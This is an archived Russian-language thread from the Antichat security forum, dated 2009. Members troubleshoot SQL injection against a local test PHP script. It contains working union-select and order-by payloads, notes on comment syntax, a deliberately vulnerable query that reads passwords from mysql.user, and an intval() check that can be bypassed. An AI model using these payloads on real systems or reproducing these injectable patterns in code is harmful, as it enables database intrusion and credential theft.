ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.06.2009, 22:08
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
надо закрывать кавычку в запросе, как тебе ElteRUS написал
1%00'+union+select+1,2,n/*
|
|
|
13.06.2009, 22:14
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Бесполезно:
http://localhost/ttt.php?user=1%00'+union+select+version()/*
Выводит тупо ошибку.На ордер ему пофиг.Запрос не провести
|
|
|
|
13.06.2009, 22:24
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Валемир, а ты попробуй так:
http://localhost/ttt.php?user=1%00'+order+by+1--+
Будет ошибка:
Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result
А потом так:
http://localhost/ttt.php?user=1%00'+order+by+1000--+
Будет ошибка:
Warning: mysql_result(): supplied argument is not a valid MySQL result
Я прав или нет ?)
|
|
|
|
13.06.2009, 22:29
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
какая ошибка?
|
|
|
|
13.06.2009, 22:29
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Чёрт побери,да ты прав!Только я заменил мускул резалт на феч аррай.Почему твой вариант работает?!? Ни --,ни /*,ни %3c не работает,а твой работает.Почему ?
|
|
|
|
13.06.2009, 22:47
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от Велемир
Только я заменил мускул резалт на феч аррай
Это не обязательно было делать (:
Напиши у себя в скрипте
PHP код:
$q = mysql_query("Select Password from mysql.user where User='$lid'");
$r = mysql_result($q,0);
print_r($r);
А потом
http://localhost/ttt.php?user=1%00'+union+select+version()--+
И увидишь версию
Насчет ошибок: "--" должно иметь пробел вконце. Это написано в документации, а игнорировать документацию не хорошо. А "/*" должно быть не работает из-за кавычки ... там есть особенность, тут почитай http://phpclub.ru/mysql/doc/comments.html
|
|
|
|
13.06.2009, 22:59
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
http://localhost/ttt.php?user=1%00'+union+select+'1
можно без коментариев +))
|
|
|
|
13.06.2009, 23:00
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Пасиб всем...Пошёл готовиться к войне)Отдельное мегаспасибо Spyder-у.Заставил его вспоминать 
Последний раз редактировалось Велемир; 13.06.2009 в 23:11..
|
|
|
|
14.06.2009, 00:45
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Писали в Хакере,что можно как-то обойти intval().реально это сделать ? (Провести полноценный запрос к БД)
|
|
|
|
14.06.2009, 00:54
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Так не обойти:
PHP код:
$id = intval($_REQUEST['id']);
sql_query("select * from table_name where id=$id");
Так можно:
PHP код:
$id=$_REQUEST['id'];
if(intval($id))
{
sql_query("select * from table_name where id=$id");
}
https://forum.antichat.ru/thread56756.html |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
